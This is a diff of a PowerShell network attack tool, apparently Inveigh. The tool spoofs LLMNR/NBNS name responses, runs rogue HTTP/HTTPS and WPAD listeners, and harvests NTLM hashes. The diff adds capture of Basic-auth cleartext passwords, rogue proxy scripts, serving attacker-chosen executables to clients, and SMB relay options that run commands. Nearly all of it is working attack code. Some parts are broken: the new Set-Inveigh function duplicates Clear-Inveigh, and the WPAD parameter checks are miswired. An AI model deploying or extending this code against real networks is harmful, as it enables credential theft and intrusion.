[parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$IP="", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SpooferIP="", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$WPADIP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$HTTPDir="", [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][string]$OutputDir="", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="", + [parameter(Mandatory=$false)][array]$SpooferHostsReply="", + [parameter(Mandatory=$false)][array]$SpooferHostsIgnore="", + [parameter(Mandatory=$false)][array]$SpooferIPsReply="", + [parameter(Mandatory=$false)][array]$SpooferIPsIgnore="", + [parameter(Mandatory=$false)][array]$SMBRelayUsernames="", + [parameter(Mandatory=$false)][int]$WPADPort="", [parameter(Mandatory=$false)][int]$RunTime="", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][string]$Tool="0", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$ShowHelp="Y", - [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter + [parameter(Mandatory=$false)][int]$SMBRelayNetworkTimeout="", + [parameter(Mandatory=$false)][string]$HTTPBasicRealm="IIS", + [parameter(Mandatory=$false)][string]$HTTPDefaultFile="", + [parameter(Mandatory=$false)][string]$HTTPDefaultEXE="", + [parameter(Mandatory=$false)][string]$HTTPResponse="", + [parameter(Mandatory=$false)][string]$HTTPSCertThumbprint="76a49fd27011cf4311fb6914c904c90a89f3e4b2", + [parameter(Mandatory=$false)][string]$WPADResponse="", + [parameter(Mandatory=$false)][string]$SMBRelayCommand="", + [parameter(Mandatory=$false)][switch]$Inspect, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) if ($invalid_parameter) @@ -206,6 +269,36 @@ if($SMBRelay -eq 'y') } } +if($SMBRelay -eq 'y' -and ($Challenge -or $HTTPDefaultFile -or $HTTPDefaultEXE -or $HTTPResponse -or $WPADIP -or $WPADPort -or $WPADResponse)) +{ + Throw "-Challenge -HTTPDefaultFile, -HTTPDefaultEXE, -HTTPResponse, -WPADIP, -WPADPort, and -WPADResponse can not be used when enabling -SMBRelay" +} +elseif($SMBRelay -eq 'y' -and ($HTTPAuth -ne 'NTLM' -or $WPADAuth -eq 'Basic')) +{ + Throw "Only -HTTPAuth NTLM, -WPADAuth NTLM, and -WPAD Anonymous can be used when enabling -SMBRelay" +} + +if($HTTPDefaultFile -or $HTTPDefaultEXE) +{ + if(!$HTTPDir) + { + Throw "You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE" + } +} + +if($WPADIP -eq 'y' -or $WPADPort -eq 'y') +{ + if(!$WPADIP) + { + Throw "You must specify a -WPADPort to go with -WPADIP" + } + + if(!$WPADPort) + { + Throw "You must specify a -WPADIP to go with -WPADPort" + } +} + if(!$OutputDir) { $output_directory = $PWD.Path @@ -221,11 +314,20 @@ if(!$inveigh) $inveigh.log = New-Object System.Collections.ArrayList $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList + $inveigh.cleartext_list = New-Object System.Collections.ArrayList $inveigh.IP_capture_list = @() $inveigh.SMBRelay_failed_list = @() } -$inveigh.running = $false +if($inveigh.running) +{ + Throw "Invoke-Inveigh is already running, use Stop-Inveigh" +} +elseif($inveigh.relay_running) +{ + Throw "Invoke-InveighRelay is already running, use Stop-Inveigh" +} + $inveigh.sniffer_socket = $null if($inveigh.HTTP_listener.IsListening) @@ -239,7 +341,8 @@ $inveigh.status_queue = New-Object System.Collections.ArrayList $inveigh.log_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList -$inveigh.certificate_thumbprint = "76a49fd27011cf4311fb6914c904c90a89f3e4b2" +$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList +$inveigh.certificate_thumbprint = $HTTPSCertThumbprint $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList $inveigh.console_output = $false $inveigh.console_input = $true @@ -247,7 +350,13 @@ $inveigh.file_output = $false $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" -$Inveigh.challenge = $Challenge +$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" +$inveigh.HTTP_response = $HTTPResponse +$inveigh.HTTP_directory = $HTTPDir +$inveigh.HTTP_default_file = $HTTPDefaultFile +$inveigh.HTTP_default_exe = $HTTPDefaultEXE +$inveigh.WPAD_response = $WPADResponse +$inveigh.challenge = $Challenge $inveigh.running = $true if($StatusOutput -eq 'y') @@ -268,7 +377,16 @@ else $inveigh.output_stream_only = $false } -if($Tool -eq 1) # Metasploit Interactive Powershell +if($Inspect) +{ + $LLMNR = "N" + $NBNS = "N" + $HTTP = "N" + $HTTPS = "N" + $SMB = "N" +} + +if($Tool -eq 1) # Metasploit Interactive PowerShell { $inveigh.tool = 1 $inveigh.output_stream_only = $true @@ -313,12 +431,6 @@ else $LLMNR_response_message = "- LLMNR spoofing is disabled" } -if($SpoofList -and ($LLMNR -eq 'y' -or $NBNS -eq 'y')) -{ - $spoof_list_output = $SpoofList -join "," - $inveigh.status_queue.add("Spoofing only $spoof_list_output")|Out-Null -} - if($NBNS -eq 'y') { $NBNSTypes_output = $NBNSTypes -join "," @@ -340,17 +452,46 @@ else $NBNS_response_message = "- NBNS spoofing is disabled" } -if($Repeat -eq 'n') +if($SpooferHostsReply -and ($LLMNR -eq 'y' -or $NBNS -eq 'y')) { - $inveigh.repeat = $false - $inveigh.status_queue.add("Spoof Repeating Disabled")|Out-Null + $inveigh.status_queue.add("Spoofing requests for " + $SpooferHostsReply -join ",")|Out-Null +} + +if($SpooferHostsIgnore -and ($LLMNR -eq 'y' -or $NBNS -eq 'y')) +{ + $inveigh.status_queue.add("Ignoring requests for " + $SpooferHostsIgnore -join ",")|Out-Null +} + +if($SpooferIPsReply -and ($LLMNR -eq 'y' -or $NBNS -eq 'y')) +{ + $inveigh.status_queue.add("Spoofing requests from " + $SpooferIPsReply -join ",")|Out-Null +} + +if($SpooferIPsIgnore -and ($LLMNR -eq 'y' -or $NBNS -eq 'y')) +{ + $inveigh.status_queue.add("Ignoring requests from " + $SpooferIPsIgnore -join ",")|Out-Null +} + +if($SpooferRepeat -eq 'n') +{ + $inveigh.spoofer_repeat = $false + $inveigh.status_queue.add("Spoofer Repeating Disabled")|Out-Null } else { - $inveigh.repeat = $true + $inveigh.spoofer_repeat = $true $inveigh.IP_capture_list = @() } +if($SMB -eq 'y') +{ + $inveigh.status_queue.add("SMB Capture Enabled")|Out-Null +} +else +{ + $inveigh.status_queue.add("SMB Capture Disabled")|Out-Null +} + if($HTTP -eq 'y') { $inveigh.HTTP = $true @@ -389,32 +530,56 @@ else $inveigh.status_queue.add("HTTPS Capture Disabled")|Out-Null } -if($Challenge) +if($HTTPDir -and !$HTTPResponse) { - $inveigh.status_queue.add("NTLM Challenge = $Challenge")|Out-Null + $inveigh.status_queue.add("HTTP/HTTPS Directory = $HTTPDir")|Out-Null + + if($HTTPDefaultFile) + { + $inveigh.status_queue.add("HTTP/HTTPS Default Response File = $HTTPDefaultFile")|Out-Null + } + + if($HTTPDefaultEXE) + { + $inveigh.status_queue.add("HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE")|Out-Null + } } -if($SMB -eq 'y') +if($HTTPResponse) { - $inveigh.status_queue.add("SMB Capture Enabled")|Out-Null + $inveigh.status_queue.add("HTTP/HTTPS Custom Response Enabled")|Out-Null } -else + +if($HTTP -eq 'y' -or $HTTPS -eq 'y') { - $inveigh.status_queue.add("SMB Capture Disabled")|Out-Null + $inveigh.status_queue.add("HTTP/HTTPS Authentication = $HTTPAuth")|Out-Null + $inveigh.status_queue.add("WPAD Authentication = $WPADAuth")|Out-Null } -if($MachineAccounts -eq 'n') +if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic') { - $inveigh.status_queue.add("Ignoring Machine Accounts")|Out-Null + $inveigh.status_queue.add("Basic Authentication Realm = $HTTPBasicRealm")|Out-Null } -if($ForceWPADAuth -eq 'y') +if($WPADIP -and $WPADPort) { - $inveigh.status_queue.add("Force WPAD Authentication Enabled")|Out-Null + $inveigh.status_queue.add("WPAD = $WPADIP`:$WPADPort")|Out-Null + $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" } -else +elseif($WPADResponse -and !$WPADIP -and !$WPADPort) +{ + $inveigh.status_queue.add("WPAD Custom Response Enabled")|Out-Null + $inveigh.WPAD_response = $WPADResponse +} + +if($Challenge) { - $inveigh.status_queue.add("Force WPAD Authentication Disabled")|Out-Null + $inveigh.status_queue.add("NTLM Challenge = $Challenge")|Out-Null +} + +if($MachineAccounts -eq 'n') +{ + $inveigh.status_queue.add("Ignoring Machine Accounts")|Out-Null } if($ConsoleOutput -eq 'y') @@ -456,7 +621,6 @@ elseif($RunTime -gt 1) if($SMBRelay -eq 'n') { - if($ShowHelp -eq 'y') { $inveigh.status_queue.add("Use Get-Command -Noun Inveigh* to show available functions")|Out-Null @@ -497,7 +661,7 @@ if($SMBRelay -eq 'n') } else { - Invoke-InveighRelay -HTTP $HTTP -HTTPS $HTTPS -SMBRelayTarget $SMBRelayTarget -SMBRelayUsernames $SMBRelayUsernames -SMBRelayAutoDisable $SMBRelayAutoDisable -SMBRelayNetworkTimeout $SMBRelayNetworkTimeout -MachineAccounts $MachineAccounts -SMBRelayCommand $SMBRelayCommand -Tool $Tool -ShowHelp $ShowHelp + Invoke-InveighRelay -HTTP $HTTP -HTTPS $HTTPS -HTTPSCertThumbprint $HTTPSCertThumbprint -WPADAuth $WPADAuth -SMBRelayTarget $SMBRelayTarget -SMBRelayUsernames $SMBRelayUsernames -SMBRelayAutoDisable $SMBRelayAutoDisable -SMBRelayNetworkTimeout $SMBRelayNetworkTimeout -MachineAccounts $MachineAccounts -SMBRelayCommand $SMBRelayCommand -Tool $Tool -ShowHelp $ShowHelp } # Begin ScriptBlocks @@ -621,11 +785,10 @@ $SMB_NTLM_functions_scriptblock = { $inveigh.console_queue.add("SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) } - } } - if (($inveigh.IP_capture_list -notcontains $source_IP) -and (-not $NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat) -and ($source_IP -ne $IP)) + if (($inveigh.IP_capture_list -notcontains $source_IP) -and (-not $NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat) -and ($source_IP -ne $IP)) { $inveigh.IP_capture_list += $source_IP } @@ -637,7 +800,7 @@ $SMB_NTLM_functions_scriptblock = # HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener $HTTP_scriptblock = { - param ($MachineAccounts,$ForceWPADAuth) + param ($HTTPAuth,$HTTPBasicRealm,$MachineAccounts,$WPADAuth) Function NTLMChallengeBase64 { @@ -647,10 +810,10 @@ $HTTP_scriptblock = $HTTP_timestamp = [BitConverter]::ToString([BitConverter]::GetBytes($HTTP_timestamp)) $HTTP_timestamp = $HTTP_timestamp.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} - if($Inveigh.challenge) + if($inveigh.challenge) { - $HTTP_challenge = $Inveigh.challenge - $HTTP_challenge_bytes = $Inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') + $HTTP_challenge = $inveigh.challenge + $HTTP_challenge_bytes = $inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)} } else @@ -685,7 +848,55 @@ $HTTP_scriptblock = $inveigh.context = $inveigh.HTTP_listener.GetContext() $inveigh.request = $inveigh.context.Request $inveigh.response = $inveigh.context.Response - $inveigh.message = '' + + if($inveigh.HTTP_directory -and $inveigh.HTTP_default_EXE -and ($inveigh.request.RawUrl -like '*.exe') -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))) + { + [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) + } + elseif($inveigh.HTTP_directory) + { + if(($inveigh.HTTP_default_file) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) -and ($inveigh.request.RawUrl -notmatch '/wpad.dat')) + { + [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) + } + elseif(($inveigh.HTTP_default_file) -and ($inveigh.request.RawUrl -eq '/') -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))) + { + [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) + } + elseif(($inveigh.WPAD_response) -and ($inveigh.request.RawUrl -match '/wpad.dat')) + { + [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.WPAD_response) + } + else + { + if(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) + { + [byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) + } + else + { + [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.HTTP_response) + } + } + } + else + { + if($inveigh.HTTP_response) + { + $inveigh.message = $inveigh.HTTP_response + } + elseif($inveigh.request.RawUrl -match '/wpad.dat') + { + $inveigh.message = $inveigh.WPAD_response + } + else + { + $inveigh.message = '' + } + + [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message) + } + $NTLM = 'NTLM' if($inveigh.request.IsSecureConnection) @@ -697,8 +908,7 @@ $HTTP_scriptblock = $HTTP_type = "HTTP" } - - if (($inveigh.request.RawUrl -match '/wpad.dat') -and ($ForceWPADAuth -eq 'n')) + if(($inveigh.request.RawUrl -match '/wpad.dat') -and ($WPADAuth -eq 'Anonymous')) { $inveigh.response.StatusCode = 200 } @@ -706,6 +916,12 @@ $HTTP_scriptblock = { $inveigh.response.StatusCode = 401 } + + if (!$inveigh.request.headers["Authorization"]) + { + $inveigh.console_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address) + $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)]) + } [string]$authentication_header = $inveigh.request.headers.getvalues('Authorization') @@ -718,7 +934,7 @@ $HTTP_scriptblock = if($HTTP_request_bytes[8] -eq 1) { $inveigh.response.StatusCode = 401 - $NTLM = NTLMChallengeBase64 + $NTLM = NTLMChallengeBase64 } elseif($HTTP_request_bytes[8] -eq 3) { @@ -767,7 +983,7 @@ $HTTP_scriptblock = } } - if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat)) + if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat)) { $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address } @@ -789,11 +1005,10 @@ $HTTP_scriptblock = if($inveigh.file_output) { $inveigh.console_queue.add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) - } - + } } - if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.repeat)) + if (($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address) -and (-not $HTTP_NTLM_user_string.EndsWith('$')) -and (!$inveigh.spoofer_repeat)) { $inveigh.IP_capture_list += $inveigh.request.RemoteEndpoint.Address } @@ -807,12 +1022,37 @@ $HTTP_scriptblock = { $NTLM = 'NTLM' } - } - - [byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message) + elseif($authentication_header.startswith('Basic ')) # Thanks to @xorrior for the initial basic auth code + { + $inveigh.response.StatusCode = 200 + $authentication_header = $authentication_header -replace 'Basic ','' + $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header)) + $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.request.RemoteEndpoint.address)]) + $inveigh.cleartext_file_queue.add($cleartext_credentials) + $inveigh.cleartext_list.add($cleartext_credentials) + $inveigh.console_queue.add("$(Get-Date -format 's') - Basic auth cleartext credentials $cleartext_credentials captured from " + $inveigh.request.RemoteEndpoint.address) + + if($inveigh.file_output) + { + $inveigh.console_queue.add("Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file) + } + } + + if(($HTTPAuth -eq 'NTLM' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $inveigh.request.RawUrl -match '/wpad.dat')) + { + $inveigh.response.AddHeader("WWW-Authenticate",$NTLM) + } + elseif(($HTTPAuth -eq 'Basic' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $inveigh.request.RawUrl -match '/wpad.dat')) + { + $inveigh.response.AddHeader("WWW-Authenticate","Basic realm=$HTTPBasicRealm") + } + else + { + $inveigh.response.StatusCode = 200 + } + $inveigh.response.ContentLength64 = $HTTP_buffer.length - $inveigh.response.AddHeader("WWW-Authenticate",$NTLM) $HTTP_stream = $inveigh.response.OutputStream $HTTP_stream.write($HTTP_buffer, 0, $HTTP_buffer.length) $HTTP_stream.close() @@ -826,7 +1066,7 @@ $HTTP_scriptblock = # Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer $sniffer_scriptblock = { - param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpoofList,$MachineAccounts,$ForceWPADAuth,$RunTime) + param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$MachineAccounts,$RunTime) $byte_in = New-Object Byte[] 4 $byte_out = New-Object Byte[] 4 @@ -1018,7 +1258,7 @@ $sniffer_scriptblock = { if($NBNSTypes -contains $NBNS_query_type) { - if ((!$Spooflist -or $SpoofList -contains $NBNS_query_string) -and $inveigh.IP_capture_list -notcontains $source_IP) + if ((!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and $inveigh.IP_capture_list -notcontains $source_IP) { [void]$send_socket.sendTo( $NBNS_response_packet, $destination_point ) $send_socket.Close() @@ -1026,9 +1266,21 @@ $sniffer_scriptblock = } else { - if($SpoofList -notcontains $NBNS_query_string) + if($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string) { - $NBNS_response_message = "- $NBNS_query_string not on spoof list" + $NBNS_response_message = "- $NBNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $NBNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $NBNS_response_message = "- $source_IP is on ignore list" } else { @@ -1077,7 +1329,7 @@ $sniffer_scriptblock = if($LLMNR -eq 'y') { - if((!$Spooflist -or $SpoofList -contains $LLMNR_query_string) -and $inveigh.IP_capture_list -notcontains $source_IP) + if((!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and $inveigh.IP_capture_list -notcontains $source_IP) { [void]$send_socket.sendTo( $LLMNR_response_packet, $destination_point ) $send_socket.Close( ) @@ -1085,9 +1337,21 @@ $sniffer_scriptblock = } else { - if($SpoofList -notcontains $LLMNR_query_string) + if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string) { - $LLMNR_response_message = "- $LLMNR_query_string not on spoof list" + $LLMNR_response_message = "- $LLMNR_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string) + { + $LLMNR_response_message = "- $LLMNR_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $LLMNR_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $LLMNR_response_message = "- $source_IP is on ignore list" } else { @@ -1178,6 +1442,12 @@ $sniffer_scriptblock = $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append $inveigh.NTLMv2_file_queue.RemoveRange(0,1) } + + while($inveigh.cleartext_file_queue.Count -gt 0) + { + $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append + $inveigh.cleartext_file_queue.RemoveRange(0,1) + } } } @@ -1213,11 +1483,9 @@ Function HTTPListener() $HTTP_powershell = [powershell]::Create() $HTTP_powershell.Runspace = $HTTP_runspace $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null - $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null - $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null - $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($MachineAccounts).AddArgument($ForceWPADAuth) > $null + $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($HTTPAuth).AddArgument( + $HTTPBasicRealm).AddArgument($MachineAccounts).AddArgument($WPADAuth) > $null $HTTP_handle = $HTTP_powershell.BeginInvoke() } @@ -1233,8 +1501,9 @@ Function SnifferSpoofer() $sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null $sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($LLMNR_response_message).AddArgument( $NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument( - $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpoofList).AddArgument( - $MachineAccounts).AddArgument($ForceWPADAuth).AddArgument($RunTime) > $null + $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument( + $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( + $MachineAccounts).AddArgument($RunTime) > $null $sniffer_handle = $sniffer_powershell.BeginInvoke() } @@ -1266,6 +1535,11 @@ if($inveigh.console_output) { switch -wildcard ($inveigh.console_queue[0]) { + "*cleartext credentials written to*" + { + write-warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveRange(0,1) + } "*local administrator*" { write-warning $inveigh.console_queue[0] @@ -1438,6 +1712,11 @@ Function Get-Inveigh { switch -wildcard ($inveigh.console_queue[0]) { + "*cleartext credentials written to*" + { + write-warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveRange(0,1) + } "*local administrator*" { write-warning $inveigh.console_queue[0] @@ -1479,6 +1758,15 @@ Function Get-Inveigh } } +Function Get-InveighCleartext +{ + <# + .SYNOPSIS + Get-InveighCleartext will get all captured cleartext credentials. + #> + $inveigh.cleartext_list +} + Function Get-InveighNTLM { <# @@ -1496,11 +1784,11 @@ Function Get-InveighNTLMv1 Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes. .PARAMETER Unique - Default = Disabled: Enable/Disable displaying only the first captured challenge/response for each unique account. + Display only the first captured challenge/response for each unique account. #> param ( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Unique="N", + [parameter(Mandatory=$false)][switch]$Unique, [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter ) @@ -1509,7 +1797,7 @@ Function Get-InveighNTLMv1 throw "$($invalid_parameter) is not a valid parameter." } - if($Unique -eq 'y') + if($Unique) { $inveigh.NTLMv1_list.sort() @@ -1538,11 +1826,11 @@ Function Get-InveighNTLMv2 Get-InveighNTLMv2 will get captured NTLMv1 challenge/response hashes. .PARAMETER Unique - Default = Disabled: Enable/Disable displaying only the first captured challenge/response for each unique account. + Display only the first captured challenge/response for each unique account. #> param ( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$Unique="N", + [parameter(Mandatory=$false)][switch]$Unique, [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter ) @@ -1551,7 +1839,7 @@ Function Get-InveighNTLMv2 throw "$($invalid_parameter) is not a valid parameter." } - if($Unique -eq 'y') + if($Unique) { $inveigh.NTLMv2_list.sort() @@ -1588,6 +1876,7 @@ Function Get-InveighStats .SYNOPSIS Get-InveighLog will get log. #> + Write-Output("Total Cleartext Captures = " + $inveigh.cleartext_list.count) Write-Output("Total NTLMv1 Captures = " + $inveigh.NTLMv1_list.count) Write-Output("Total NTLMv2 Captures = " + $inveigh.NTLMv2_list.count) } @@ -1697,3 +1986,23 @@ Function Clear-Inveigh } } } + +Function Set-Inveigh +{ + <# + .SYNOPSIS + Set-Inveigh allows setting or modifying some parameters while Inveigh is running. + #> + if($inveigh) + { + if(!$inveigh.running -and !$inveigh.relay_running) + { + Remove-Variable inveigh -scope global + Write-Output "Inveigh data has been cleared from memory" + } + else + { + Write-Output "Run Stop-Inveigh before running Clear-Inveigh" + } + } +} |